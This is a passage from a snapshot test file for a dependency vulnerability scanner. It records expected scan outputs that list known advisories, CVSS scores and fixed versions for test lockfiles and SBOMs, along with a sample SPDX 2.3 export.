ecosystem. 0 vulnerabilities can be fixed. +---------------------------------------+------+-----------+---------+-----------+---------------+------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+---------+-----------+---------------+------------------------------------------------+ | https://osv.dev/ALPINE-CVE-2025-26519 | 7.0 | Alpine | musl | 1.2.3-r4 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2018-25032 | 7.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | +---------------------------------------+------+-----------+---------+-----------+---------------+------------------------------------------------+ --- [TestCommand/one_specific_supported_sbom_with_duplicate_PURLs - 2] --- [TestCommand/one_specific_supported_sbom_with_duplicate_PURLs_using_-L_flag - 1] Scanned /testdata/sbom-insecure/with-duplicates.cdx.xml file and found 17 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 1 local/unscannable package/s from the scan. Total 2 packages affected by 5 known vulnerabilities (1 Critical, 3 High, 1 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +---------------------------------------+------+-----------+---------+-----------+---------------+------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+---------+-----------+---------------+------------------------------------------------+ | https://osv.dev/ALPINE-CVE-2025-26519 | 7.0 | Alpine | musl | 1.2.3-r4 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2018-25032 | 7.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | +---------------------------------------+------+-----------+---------+-----------+---------------+------------------------------------------------+ --- [TestCommand/one_specific_supported_sbom_with_duplicate_PURLs_using_-L_flag - 2] --- [TestCommand/one_specific_supported_sbom_with_invalid_PURLs - 1] Warning: --sbom has been deprecated in favor of -L Scanned /testdata/sbom-insecure/bad-purls.cdx.xml file and found 15 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 7 local/unscannable package/s from the scan. No issues found --- [TestCommand/one_specific_supported_sbom_with_invalid_PURLs - 2] --- [TestCommand/one_specific_supported_sbom_with_invalid_PURLs_using_-L_flag - 1] Scanned /testdata/sbom-insecure/bad-purls.cdx.xml file and found 15 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 7 local/unscannable package/s from the scan. No issues found --- [TestCommand/one_specific_supported_sbom_with_invalid_PURLs_using_-L_flag - 2] --- [TestCommand/one_specific_supported_sbom_with_vulns - 1] Warning: --sbom has been deprecated in favor of -L Scanned /testdata/sbom-insecure/alpine.cdx.xml file and found 15 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 1 local/unscannable package/s from the scan. Total 2 packages affected by 5 known vulnerabilities (1 Critical, 3 High, 1 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ | https://osv.dev/ALPINE-CVE-2025-26519 | 7.0 | Alpine | musl | 1.2.3-r4 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2018-25032 | 7.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ --- [TestCommand/one_specific_supported_sbom_with_vulns - 2] --- [TestCommand/one_specific_supported_sbom_with_vulns_using_-L_flag - 1] Scanned /testdata/sbom-insecure/alpine.cdx.xml file and found 15 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 1 local/unscannable package/s from the scan. Total 2 packages affected by 5 known vulnerabilities (1 Critical, 3 High, 1 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ | https://osv.dev/ALPINE-CVE-2025-26519 | 7.0 | Alpine | musl | 1.2.3-r4 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2018-25032 | 7.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ --- [TestCommand/one_specific_supported_sbom_with_vulns_using_-L_flag - 2] --- [TestCommand/one_specific_unsupported_lockfile - 1] Scanning dir ./testdata/locks-many/not-a-lockfile.toml Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand/one_specific_unsupported_lockfile - 2] No package sources found, --help for usage information. --- [TestCommand/only_the_files_in_the_given_directories_are_checked_by_default_(no_recursion) - 1] Scanning dir ./testdata/locks-one-with-nested Scanned /testdata/locks-one-with-nested/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand/only_the_files_in_the_given_directories_are_checked_by_default_(no_recursion) - 2] --- [TestCommand/output_format:_markdown_table - 1] Scanning dir ./testdata/locks-many-with-insecure/package-lock.json Scanned /testdata/locks-many-with-insecure/package-lock.json file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 1 package affected by 1 known vulnerability (0 Critical, 1 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/GHSA-whgm-jr23-g3j9 | 7.5 | npm | ansi-html | 0.0.1 | 0.0.8 | testdata/locks-many-with-insecure/package-lock.json | --- [TestCommand/output_format:_markdown_table - 2] --- [TestCommand/output_format:_unsupported - 1] --- [TestCommand/output_format:_unsupported - 2] unsupported output format "unknown" - must be one of: table, html, vertical, json, markdown, sarif, gh-annotations, cyclonedx-1-4, cyclonedx-1-5, spdx-2-3 --- [TestCommand/requirements.txt_can_have_all_kinds_of_names - 1] Scanning dir ./testdata/locks-requirements Scanned /testdata/locks-requirements/my-requirements.txt file and found 1 package Scanned /testdata/locks-requirements/requirements-dev.txt file and found 1 package Scanned /testdata/locks-requirements/requirements-transitive.txt file and found 4 packages Scanned /testdata/locks-requirements/requirements.prod.txt file and found 1 package Scanned /testdata/locks-requirements/requirements.txt file and found 3 packages Scanned /testdata/locks-requirements/the_requirements_for_test.txt file and found 1 package Scanned /testdata/locks-requirements/unresolvable-requirements.txt file and found 3 packages Total 12 packages affected by 50 known vulnerabilities (5 Critical, 20 High, 20 Medium, 4 Low, 1 Unknown) from 1 ecosystem. 50 vulnerabilities can be fixed. +-------------------------------------+------+-----------+------------+---------+---------------+-----------------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+------------+---------+---------------+-----------------------------------------------------------+ | https://osv.dev/PYSEC-2023-62 | 8.7 | PyPI | flask | 1.0.0 | 2.2.5 | testdata/locks-requirements/my-requirements.txt | | https://osv.dev/GHSA-m2qf-hxjv-5gpq | | | | | | | | https://osv.dev/GHSA-68rp-wp8r-4726 | 2.3 | PyPI | flask | 1.0.0 | 3.1.3 | testdata/locks-requirements/my-requirements.txt | | https://osv.dev/GHSA-3936-cmfr-pm3m | 8.7 | PyPI | black | 25.1.0 | 26.3.1 | testdata/locks-requirements/requirements-dev.txt | | https://osv.dev/PYSEC-2021-98 | 6.9 | PyPI | django | 1.11.29 | 2.2.24 | testdata/locks-requirements/requirements-transitive.txt | | https://osv.dev/GHSA-68w8-qjq3-2gfm | | | | | | | | https://osv.dev/GHSA-6w2r-r2m5-xq5w | 7.1 | PyPI | django | 1.11.29 | 4.2.24 | testdata/locks-requirements/requirements-transitive.txt | | https://osv.dev/GHSA-7xr5-9hcq-chf9 | 4.0 | PyPI | django | 1.11.29 | 4.2.22 | testdata/locks-requirements/requirements-transitive.txt | | https://osv.dev/GHSA-8x94-hmjh-97hq | 8.8 | PyPI | django | 1.11.29 | 3.2.15 | testdata/locks-requirements/requirements-transitive.txt | | https://osv.dev/GHSA-frmv-pr5f-9mcr | 9.1 | PyPI | django | 1.11.29 | 4.2.26 | testdata/locks-requirements/requirements-transitive.txt | | https://osv.dev/GHSA-qw25-v68c-qjf3 | 7.5 | PyPI | django | 1.11.29 | 4.2.26 | testdata/locks-requirements/requirements-transitive.txt | | https://osv.dev/GHSA-rrqc-c2jx-6jgv | 6.3 | PyPI | django | 1.11.29 | 4.2.16 | testdata/locks-requirements/requirements-transitive.txt | | https://osv.dev/PYSEC-2023-62 | 8.7 | PyPI | flask | 1.0.0 | 2.2.5 | testdata/locks-requirements/requirements-transitive.txt | | https://osv.dev/GHSA-m2qf-hxjv-5gpq | | | | | | | | https://osv.dev/GHSA-68rp-wp8r-4726 | 2.3 | PyPI | flask | 1.0.0 | 3.1.3 | testdata/locks-requirements/requirements-transitive.txt | | https://osv.dev/PYSEC-2023-74 | 6.1 | PyPI | requests | 2.20.0 | 2.31.0 | testdata/locks-requirements/requirements-transitive.txt | | https://osv.dev/GHSA-j8r2-6x86-q33q | | | | | | | | https://osv.dev/GHSA-9hjg-9r4m-mvj7 | 5.3 | PyPI | requests | 2.20.0 | 2.32.4 | testdata/locks-requirements/requirements-transitive.txt | | https://osv.dev/GHSA-9wx4-h78v-vm56 | 5.6 | PyPI | requests | 2.20.0 | 2.32.0 | testdata/locks-requirements/requirements-transitive.txt | | https://osv.dev/PYSEC-2021-439 | 7.3 | PyPI | django | 2.2.24 | 2.2.25 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/GHSA-v6rh-hp5x-86rv | | | | | | | | https://osv.dev/PYSEC-2022-1 | 8.7 | PyPI | django | 2.2.24 | 2.2.26 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/GHSA-53qw-q765-4fww | | | | | | | | https://osv.dev/PYSEC-2022-19 | 6.1 | PyPI | django | 2.2.24 | 2.2.27 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/GHSA-95rw-fx8r-36v6 | | | | | | | | https://osv.dev/PYSEC-2022-190 | 9.8 | PyPI | django | 2.2.24 | 2.2.28 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/GHSA-2gwj-7jmv-h26r | | | | | | | | https://osv.dev/PYSEC-2022-191 | 9.8 | PyPI | django | 2.2.24 | 2.2.28 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/GHSA-w24h-v9qh-8gxj | | | | | | | | https://osv.dev/PYSEC-2022-2 | 8.7 | PyPI | django | 2.2.24 | 2.2.26 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/GHSA-8c5j-9r9f-c6w8 | | | | | | | | https://osv.dev/PYSEC-2022-20 | 8.7 | PyPI | django | 2.2.24 | 2.2.27 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/GHSA-6cw3-g6wv-c2xv | | | | | | | | https://osv.dev/PYSEC-2022-3 | 6.9 | PyPI | django | 2.2.24 | 2.2.26 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/GHSA-jrh2-hc4r-7jwx | | | | | | | | https://osv.dev/GHSA-6w2r-r2m5-xq5w | 7.1 | PyPI | django | 2.2.24 | 4.2.24 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/GHSA-7xr5-9hcq-chf9 | 4.0 | PyPI | django | 2.2.24 | 4.2.22 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/GHSA-8x94-hmjh-97hq | 8.8 | PyPI | django | 2.2.24 | 3.2.15 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/GHSA-frmv-pr5f-9mcr | 9.1 | PyPI | django | 2.2.24 | 4.2.26 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/GHSA-qw25-v68c-qjf3 | 7.5 | PyPI | django | 2.2.24 | 4.2.26 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/GHSA-rrqc-c2jx-6jgv | 6.3 | PyPI | django | 2.2.24 | 4.2.16 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/PYSEC-2021-98 | 6.9 | PyPI | django | 1.11.29 | 2.2.24 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-68w8-qjq3-2gfm | | | | | | | | https://osv.dev/GHSA-6w2r-r2m5-xq5w | 7.1 | PyPI | django | 1.11.29 | 4.2.24 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-7xr5-9hcq-chf9 | 4.0 | PyPI | django | 1.11.29 | 4.2.22 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-8x94-hmjh-97hq | 8.8 | PyPI | django | 1.11.29 | 3.2.15 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-frmv-pr5f-9mcr | 9.1 | PyPI | django | 1.11.29 | 4.2.26 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-qw25-v68c-qjf3 | 7.5 | PyPI | django | 1.11.29 | 4.2.26 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-rrqc-c2jx-6jgv | 6.3 | PyPI | django | 1.11.29 | 4.2.16 | testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2023-62 | 8.7 | PyPI | flask | 1.0.0 | 2.2.5 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-m2qf-hxjv-5gpq | | | | | | | | https://osv.dev/GHSA-68rp-wp8r-4726 | 2.3 | PyPI | flask | 1.0.0 | 3.1.3 | testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2023-74 | 6.1 | PyPI | requests | 2.20.0 | 2.31.0 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-j8r2-6x86-q33q | | | | | | | | https://osv.dev/GHSA-9hjg-9r4m-mvj7 | 5.3 | PyPI | requests | 2.20.0 | 2.32.4 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-9wx4-h78v-vm56 | 5.6 | PyPI | requests | 2.20.0 | 2.32.0 | testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2023-62 | 8.7 | PyPI | flask | 1.0.0 | 2.2.5 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/GHSA-m2qf-hxjv-5gpq | | | | | | | | https://osv.dev/GHSA-68rp-wp8r-4726 | 2.3 | PyPI | flask | 1.0.0 | 3.1.3 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/PYSEC-2020-43 | 8.7 | PyPI | flask-cors | 1.0.0 | 3.0.9 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/GHSA-xc3p-ff3m-f46v | | | | | | | | https://osv.dev/PYSEC-2024-71 | 8.7 | PyPI | flask-cors | 1.0.0 | 4.0.2 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/GHSA-hxwh-jpp2-84pm | | | | | | | | https://osv.dev/GHSA-43qf-4rqw-9q2g | 5.3 | PyPI | flask-cors | 1.0.0 | 6.0.0 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/GHSA-7rxf-gvfg-47g4 | 4.3 | PyPI | flask-cors | 1.0.0 | 6.0.0 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/GHSA-84pr-m4jr-85g5 | 5.3 | PyPI | flask-cors | 1.0.0 | 4.0.1 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/GHSA-8vgw-p6qm-5gr7 | 5.3 | PyPI | flask-cors | 1.0.0 | 6.0.0 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/PYSEC-2020-73 | | PyPI | pandas | 0.23.4 | 1.0.4 | testdata/locks-requirements/unresolvable-requirements.txt | +-------------------------------------+------+-----------+------------+---------+---------------+-----------------------------------------------------------+ --- [TestCommand/requirements.txt_can_have_all_kinds_of_names - 2] --- [TestCommand/spdx_2.3_output - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/uuid-placeholder-0", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "2025-01-01T01:01:01Z" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-uuid-placeholder-1", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "has-flag", "SPDXID": "SPDXRef-Package-has-flag-uuid-placeholder-2", "versionInfo": "4.0.0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/bunlock extractor from /testdata/locks-insecure/bun.lock", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/has-flag@4.0.0" } ] }, { "name": "wrappy", "SPDXID": "SPDXRef-Package-wrappy-uuid-placeholder-3", "versionInfo": "1.0.2", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/bunlock extractor from /testdata/locks-insecure/bun.lock", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/wrappy@1.0.2" } ] }, { "name": "league/flysystem", "SPDXID": "SPDXRef-Package-league-flysystem-uuid-placeholder-4", "versionInfo": "1.0.8", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the php/composerlock extractor from /testdata/locks-insecure/composer.lock", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:composer/league%2Fflysystem@1.0.8" } ] }, { "name": "stdlib", "SPDXID": "SPDXRef-Package-stdlib-uuid-placeholder-5", "versionInfo": "1.99.9", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the osv/osvscannerjson extractor from /testdata/locks-insecure/osv-scanner-custom.json", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:placeholder/stdlib@1.99.9" } ] }, { "name": "toolchain", "SPDXID": "SPDXRef-Package-toolchain-uuid-placeholder-6", "versionInfo": "1.99.9", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the osv/osvscannerjson extractor from /testdata/locks-insecure/osv-scanner-custom.json", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:placeholder/toolchain@1.99.9" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-uuid-placeholder-1", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-uuid-placeholder-1", "relatedSpdxElement": "SPDXRef-Package-has-flag-uuid-placeholder-2", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-has-flag-uuid-placeholder-2", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-uuid-placeholder-1", "relatedSpdxElement": "SPDXRef-Package-wrappy-uuid-placeholder-3", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-wrappy-uuid-placeholder-3", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-uuid-placeholder-1", "relatedSpdxElement": "SPDXRef-Package-league-flysystem-uuid-placeholder-4", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-league-flysystem-uuid-placeholder-4", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-uuid-placeholder-1", "relatedSpdxElement": "SPDXRef-Package-stdlib-uuid-placeholder-5", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-stdlib-uuid-placeholder-5", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-uuid-placeholder-1", "relatedSpdxElement": "SPDXRef-Package-toolchain-uuid-placeholder-6", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-toolchain-uuid-placeholder-6", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestCommand/spdx_2.3_output - 2] Scanning dir ./testdata/locks-insecure Scanned /testdata/locks-insecure/bun.lock file and found 2 packages Scanned /testdata/locks-insecure/composer.lock file and found 1 package Scanned /testdata/locks-insecure/osv-scanner-custom.json file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand/verbosity_level_=_error - 1] No issues found --- [TestCommand/verbosity_level_=_error - 2] --- [TestCommand/verbosity_level_=_info - 1] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand/verbosity_level_=_info - 2] --- [TestCommandNonGit/one_specific_supported_lockfile - 1] Scanning dir /composer.lock Scanned /composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /osv-scanner-test.toml No issues found --- [TestCommandNonGit/one_specific_supported_lockfile - 2] --- [TestCommand_CallAnalysis/Run_with_govulncheck - 1] Scanning dir ./testdata/call-analysis-go-project Scanned /testdata/call-analysis-go-project/go.mod file and found 4 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Package Go/stdlib/1.19.99 has been filtered out because: Just want to test actual packages Filtered 1 ignored package/s from the scan. Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 1 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. +-------------------------------------+------+-----------+-----------------------------+---------+---------------+------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+-----------------------------+---------+---------------+------------------------------------------+ | https://osv.dev/GO-2023-1558 | 5.9 | Go | github.com/ipfs/go-bitfield | 1.0.0 | 1.1.0 | testdata/call-analysis-go-project/go.mod | | https://osv.dev/GHSA-2h6c-j3gf-xp9r | | | | | | | +-------------------------------------+------+-----------+-----------------------------+---------+---------------+------------------------------------------+ --- [TestCommand_CallAnalysis/Run_with_govulncheck - 2] --- [TestCommand_CallAnalysis/Run_with_govulncheck_all_uncalled - 1] Scanning dir ./testdata/call-analysis-go-project-all-uncalled Scanned /testdata/call-analysis-go-project-all-uncalled/go.mod file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Package Go/stdlib/1.19.99 has been filtered out because: Just want to test actual packages Filtered 1 ignored package/s from the scan. Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestCommand_CallAnalysis/Run_with_govulncheck_all_uncalled - 2] --- [TestCommand_CallAnalysis/Run_with_govulncheck_all_uncalled_but_enabled_all-vulns_flag - 1] Scanning dir ./testdata/call-analysis-go-project-all-uncalled Scanned /testdata/call-analysis-go-project-all-uncalled/go.mod file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Package Go/stdlib/1.19.99 has been filtered out because: Just want to test actual packages Filtered 1 ignored package/s from the scan. Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-------------------------------------+------+-----------+--------------------------+---------+---------------+-------------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+--------------------------+---------+---------------+-------------------------------------------------------+ | Uncalled vulnerabilities | | | | | | | +-------------------------------------+------+-----------+--------------------------+---------+---------------+-------------------------------------------------------+ | https://osv.dev/GO-2021-0053 | 8.6 | Go | github.com/gogo/protobuf | 1.3.1 | 1.3.2 | testdata/call-analysis-go-project-all-uncalled/go.mod | | https://osv.dev/GHSA-c3h9-896r-86jm | | | | | | | +-------------------------------------+------+-----------+--------------------------+---------+---------------+-------------------------------------------------------+ --- [TestCommand_CallAnalysis/Run_with_govulncheck_all_uncalled_but_enabled_all-vulns_flag - 2] --- [TestCommand_CommitSupport/offline_uses_git_tags - 1] Scanned /testdata/locks-git/osv-scanner.json file and found 11 packages Loaded GIT local db from /osv-scanner/GIT/all.zip Skipping commit scanning for: 45fda76bc1b9fd74d10e85e0ce9b65a12dcc58b0 Total 8 packages affected by 28 known vulnerabilities (5 Critical, 5 High, 11 Medium, 0 Low, 7 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +--------------------------------+------+-----------+----------------------------+----------------------------+---------------+-------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +--------------------------------+------+-----------+----------------------------+----------------------------+---------------+-------------------------------------+ | https://osv.dev/OSV-2018-389 | | GIT | git://github.com/boostorg/boost@1a9dda41 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/OSV-2018-389 | | GIT | github.com/boostorg/boost@1a9dda41 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/OSV-2018-389 | | GIT | http://github.com/boostorg/boost@1a9dda41 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/OSV-2023-1161 | | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/OSV-2024-340 | | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/OSV-2018-389 | | GIT | https://github.com/boostorg/boost@1a9dda41 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2024-51757 | 9.3 | GIT | https://github.com/capricorn86/happy-dom.git@f8221103 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-61927 | 7.2 | GIT | https://github.com/capricorn86/happy-dom.git@f8221103 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-62410 | 9.4 | GIT | https://github.com/capricorn86/happy-dom.git@f8221103 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-11187 | 6.1 | GIT | 